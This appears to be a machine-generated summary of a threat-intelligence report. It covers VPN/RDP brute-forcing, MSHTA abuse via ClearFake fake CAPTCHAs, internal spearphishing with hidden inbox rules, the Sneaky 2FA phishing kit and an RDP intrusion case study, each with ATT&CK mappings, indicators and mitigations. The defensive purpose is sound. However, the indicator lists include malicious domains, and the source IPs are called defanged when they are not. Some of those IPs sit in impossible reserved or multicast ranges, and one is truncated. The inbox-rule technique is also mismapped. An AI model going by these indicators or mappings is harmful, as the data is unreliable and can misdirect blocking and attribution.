Full Report
Get real-world case studies and actionable recommendations on the top attacker techniques and emerging malware trends from the past quarter.
Analysis Summary
# Tool/Technique: VPN/RDP Brute-Forcing
## Overview
The technique involves attackers attempting numerous login combinations (brute-forcing) against external remote access services like VPNs, Remote Desktop Protocol (RDP), and Virtual Desktop Infrastructure (VDI) to gain initial access to enterprise environments using weak or leaked credentials.
## Technical Details
- Type: Technique
- Platform: Windows (RDP/VDI), Network Devices (VPN)
- Capabilities: Initial access via unauthorized authentication.
- First Seen: Observed surging between December 2024 and February 2025, following a large-scale attack in late January 2025.
## MITRE ATT&CK Mapping
- T1133 - External Remote Services
- T1133.001 - External Remote Services: VPN
- T1133.002 - External Remote Services: Windows Remote Desktop Protocol
## Functionality
### Core Capabilities
- Probing and testing weak/leaked credentials against externally facing remote access systems (VPN, RDP, VDI).
- Achieving initial network authentication, allowing adversaries to blend in with legitimate user traffic.
### Advanced Features
- The surge in activity suggests the use of large, distributed IP sources for the brute-force campaigns.
- Associated with financially motivated actors seeking foothold before potential ransomware deployment (e.g., Black Basta utilizing this method).
## Indicators of Compromise
- File Hashes: N/A (Focus is on network/authentication)
- File Names: N/A (Focus is on network/authentication)
- Registry Keys: N/A
- Network Indicators:
- Source IP addresses conducting brute-force attacks (defanged):
- `128.20.196.251`
- `17.191.47.249`
- `3.152.76.154`
- `146.156.94.156`
- `227.67.68.61`
- `206.86.95.158`
- `13.3.91.205`
- `164.183.88.97`
- `239.161`
- Behavioral Indicators: High volume of failed login attempts against VPN/RDP endpoints.
## Associated Threat Actors
- Financially motivated actors generally.
- Black Basta (associated with using automated brute-forcing tools for VPN/firewall compromise).
## Detection Methods
- Signature-based detection: Specific patterns in authentication logs indicating rapid, repeated failed login attempts.
- Behavioral detection: Monitoring for unusually high rates of failed logins from single or distributed external sources targeting administrator accounts (e.g., Windows Administrator account brute-forced via RDP mentioned in the case study).
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Implement Multi-Factor Authentication (MFA) on all external remote services (VPN, RDP, VDI).
- Hardening recommendations: Enforce strong password policies. Limit exposure of RDP to the internet; utilize gateways or secure tunneling instead. Monitor and actively block source IPs exhibiting brute-force behavior. Review and secure administrator accounts used for RDP access.
## Related Tools/Techniques
- Automated brute-forcing tools mentioned in connection with Black Basta.
- Use of leaked credentials found on the dark web.
- System Informer (used post-compromise for discovery, though not the initial access tool itself).
***
# Tool/Technique: MSHTA Abuse for Defense Evasion
## Overview
Attackers are increasingly leveraging `MSHTA.exe`, a legitimate Windows binary used to run HTML Applications (HTA), to execute malicious code. This abuse is often facilitated by deceptive CAPTCHAs that trick users into running commands directly via the Windows Run prompt, thereby evading standard file-based detection mechanisms.
## Technical Details
- Type: Technique
- Platform: Windows
- Capabilities: Proxy execution, defense evasion, remote code execution outside the browser sandbox.
- First Seen: Technique observed rising significantly between December 2024 and February 2025.
## MITRE ATT&CK Mapping
- T1218 - Signed Binary Proxy Execution
- T1218.005 - Signed Binary Proxy Execution: Mshta
## Functionality
### Core Capabilities
- Utilizing `MSHTA.exe` to execute malicious payloads sourced from network locations.
- Bypassing security controls that focus on traditional phishing payload delivery (e.g., executables or scripts directly attached to emails).
### Advanced Features
- Leverages user interaction via deceptive CAPTCHAs delivered via ClearFake, convincing the victim to paste and execute the malicious MSHTA command.
- Because execution occurs outside the browser context, it evades browser security features like Google Safe Browsing.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
- ClearFake Domains (defanged):
- `human-verify[dot]shop/xfiles/verify.mp4`
- `sirax[dot]shop/redclaprubz.m4a`
- `teroniga[dot]shop/remingofugu.m4a`
- `lack-behind-came-verification.trycloudflare[dot]com/cloudfla`
- `u1.tightlyreporter[dot]shop/sosalkino[dot]mov`
- `sandbox.yunqof[dot]shop/macan.mp3`
- `igameinfinity[dot]shop/suno.mp3`
- `xx.retweet[dot]shop`
- Behavioral Indicators: Execution of `mshta.exe` referencing remote content, especially when spawned from user input mechanisms like the Run dialogue, not standard file associations.
## Associated Threat Actors
Not explicitly named in association with MSHTA abuse in this section, but tied to actors utilizing ClearFake.
## Detection Methods
- Signature-based detection: Detection of known command line arguments used with `mshta.exe`.
- Behavioral detection: Monitoring for `mshta.exe` initiation from unexpected parent processes or direct user input (like Run box), accessing suspicious external URLs, or initiating subsequent malicious processes.
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Restrict the execution of HTA files or applications that execute remote content using AppLocker or similar controls.
- Hardening recommendations: User awareness training focused on recognizing techniques that force users to copy and paste commands into system utilities like Run.
## Related Tools/Techniques
- ClearFake (JavaScript framework used to deliver the deceptive CAPTCHAs).
***
# Tool/Technique: Internal Spearphishing & Inbox Rule Hiding
## Overview
Internal spearphishing remains the dominant technique for lateral movement. Attackers leverage compromised accounts (often from initial access attacks) to send highly credible phishing emails internally. This is frequently combined with hiding incoming emails using inbox rules to maintain persistence and conceal discovery by the legitimate account owner.
## Technical Details
- Type: Technique
- Platform: Email/Collaboration Systems (e.g., Microsoft 365)
- Capabilities: Lateral movement, increasing access trust, communication persistence.
- First Seen: Continues to dominate lateral movement; not a new technique, but its efficacy remains high.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1078 - Valid Accounts
- T1078.004 - Valid Accounts: Cloud Accounts
- T1564 - Hide Artifacts
- T1564.002 - Hide Artifacts: Hidden Files and Directories (Applied behaviorally to emails/rules)
## Functionality
### Core Capabilities
- Sending targeted phishing emails from a seemingly trusted internal or partner source to trick other employees.
- Exploiting the inherent trust relationship between internal colleagues (or trusted partners) to increase success rates.
### Advanced Features
- **Inbox Rule Hiding:** Attackers create hidden inbox rules to automatically move incoming malicious replies or subsequent monitoring communication out of the primary view, allowing the attacker to communicate secretly with the compromised account.
- High success rate noted when emails originate from compromised trusted partner organizations (9 out of 10 successful compromises stemmed from trusted partners).
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators: N/A
- Behavioral Indicators:
- Creation of unusual or hidden inbox rules on compromised mailboxes.
- Email traffic originating from previously compromised or newly suspicious internal accounts attempting further credential harvesting or malware delivery.
- Communication involving Microsoft Teams phishing tenants (though Teams is a separate vector, it's mentioned alongside credential compromise).
## Associated Threat Actors
Threat actors aiming for financial fraud, additional account compromises, or malware infections.
## Detection Methods
- Signature-based detection: N/A
- Behavioral detection: Monitoring audit logs for the creation or modification of inbox rules on user accounts that haven't historically made such changes. Detecting anomalous email sending patterns from compromised accounts.
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Enforce MFA universally. Implement rigorous governance over third-party access/partner accounts.
- Hardening recommendations: Review mailbox audit logs regularly for suspicious rule creation (e.g., forwarding to external addresses or moving mail to hidden folders). Enhance security around partner organization connections.
## Related Tools/Techniques
- Sneaky 2FA (Phishing kit supporting account compromise that fuels these campaigns).
***
# Tool/Technique: Sneaky 2FA Phishing Kit
## Overview
Sneaky 2FA is a newly observed phishing kit designed to simplify the process of compromising business email accounts, specifically aiding in the execution of internal phishing campaigns that rely on valid, active accounts. It was first observed in January 2025.
## Technical Details
- Type: Tool (Phishing Kit)
- Platform: Web infrastructure used for phishing operations.
- Capabilities: Phishing-as-a-Service (PhaaS) focused on stealing credentials, including those protected by Two-Factor Authentication (2FA) during the compromise phase.
- First Seen: January 2025.
## MITRE ATT&CK Mapping
- T1566 - Phishing
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
## Functionality
### Core Capabilities
- Simplifies the setup and operation of phishing sites used to capture credentials.
- Specialized in bypassing or defeating 2FA mechanisms during the credential harvesting phase.
### Advanced Features
- Operates as a "Phishing-as-a-Service," lowering the barrier to entry for less sophisticated attackers to launch complex credential theft operations.
## Indicators of Compromise
- File Hashes: N/A
- File Names: N/A
- Registry Keys: N/A
- Network Indicators:
- Sneaky2FA phishing domains (defanged):
- `assets-gbr.mkt.dynamics[dot]com`
- `files-share.portseattles[dot]org`
- Behavioral Indicators: Phishing campaigns that successfully capture multi-factor authentication tokens.
## Associated Threat Actors
Actors leveraging Phishing-as-a-Service platforms.
## Detection Methods
- Signature-based detection: Detection of network traffic patterns associated with known Sneaky 2FA infrastructure patterns.
- Behavioral detection: Detection of user agents or session behavior matching known phishing kit infrastructures.
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Use strong, hardware-based MFA (e.g., FIDO2/WebAuthn) where possible, as these are more resistant to session token interception common in sophisticated phishing.
- Hardening recommendations: Monitor DNS for newly registered domains mimicking legitimate services for phishing campaigns.
## Related Tools/Techniques
- Internal Spearphishing (Sneaky 2FA is a tool used to enable effective internal spearphishing).
- Microsoft Teams Phishing Tenants (Associated tenant examples provided for investigation).
***
# Tool/Technique: Administrator Account Brute-Forcing via RDP (Case Study Example)
## Overview
A specific incident where an attacker successfully brute-forced a Windows Administrator account exposed via RDP, leveraged system monitoring tools (`System Informer`) for reconnaissance, and then executed post-compromise activities using native administrative command-line tools (`PSExec`, `Netscan.exe`).
## Technical Details
- Type: Technique / Case Study Incident
- Platform: Windows
- Capabilities: Initial Access (RDP Brute-force), Discovery (using system tools), Execution.
- First Seen: January 2025 (Specific incident).
## MITRE ATT&CK Mapping
- T1021 - Remote Services
- T1021.001 - Remote Services: Remote Desktop Protocol
- T1046 - Network Service Scanning (Via Netscan.exe/OSINT)
- T1059 - Command and Scripting Interpreter (Via PSExec/Netscan)
## Functionality
### Core Capabilities
- Initial network infiltration via weak RDP credentials.
- Discovery performed post-authentication to map the host environment.
- Use of native Windows tools or well-known administrative tools (`PSExec`) for execution.
### Advanced Features
- The attacker used `System Informer`, an open-source tool, which served dual purposes: legitimate monitoring or malicious information exposure/discovery.
## Indicators of Compromise
- File Hashes: `System Informer` installation artifact (specific hash not provided).
- File Names: `System Informer`
- Registry Keys: N/A
- Network Indicators: N/A (Incident limited to network isolation phase).
- Behavioral Indicators:
- Execution of `PSExec` and `Netscan.exe`.
- Detection of the installation of monitoring software (`System Informer`) on critical systems.
- Excessive failed RDP logins prior to successful authentication.
## Associated Threat Actors
Unnamed actors in this specific case study, but the successful compromise indicates financially motivated or established intrusion teams.
## Detection Methods
- Signature-based detection: Signatures for known hashes of malicious versions of System Informer, if applicable.
- Behavioral detection: Detection of unauthorized installation of system monitoring tools on production systems. Monitoring for use of administrative tools like `PSExec` in unexpected sequences or contexts.
- YARA rules: N/A
## Mitigation Strategies
- Prevention measures: Enforce MFA on RDP access. Restrict RDP exposure only to jump hosts or VPN-protected networks.
- Hardening recommendations: Implement strict application control policies (e.g., Windows Defender Application Control) to whitelisting approved versions of system utilities and blocking unauthorized installations like potentially malicious open-source tools used for discovery.
## Related Tools/Techniques
- RDP Brute-Forcing (Initial Access).
- PSExec (Used for Lateral Movement/Execution).